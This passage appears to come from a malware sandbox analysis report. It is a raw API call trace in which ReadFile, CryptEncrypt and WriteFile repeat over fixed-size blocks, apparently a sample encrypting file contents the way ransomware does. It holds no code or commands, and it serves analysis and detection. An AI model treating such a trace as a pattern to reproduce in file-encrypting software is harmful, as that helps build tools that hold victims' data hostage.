hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.912] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.915] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.915] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.915] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.917] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.918] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.918] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.919] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.919] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.919] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.919] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.919] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.935] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.935] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.936] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.937] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.938] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 